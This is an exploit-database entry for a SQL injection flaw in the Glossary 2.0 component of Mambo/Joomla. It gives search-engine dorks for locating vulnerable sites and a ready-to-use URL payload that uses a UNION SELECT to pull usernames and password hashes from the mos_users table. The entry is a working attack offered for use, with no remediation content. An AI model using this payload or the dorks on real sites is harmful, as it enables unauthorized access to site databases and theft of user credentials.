id: 2565
date: 01/30/2008
title: Mambo Component Glossary 2.0 (catid) SQL Injection Vulnerability
author: S@BUN
cves: 

================================================================
Mambo Component Glossary 2.0 (catid) SQL Injection Vulnerability
================================================================



#########################################################################
#
# joomla(Glossary V2.0) SQL Injection(com_glossary)
#
#########################################################################
#
# DorKs 1 : allinurl: "com_glossary"
#
dork 2 : Glossary V2.0 (exploit working html sites)

########################################################################
EXPLOIT :

index.php?option=com_glossary&func=display&Itemid=s@bun&catid=-1%20union%20select%201,username,password,4,5,6,7,8,9,10,11,12,13,14%20from%20mos_users--



#  0day.today [2023-03-22]  #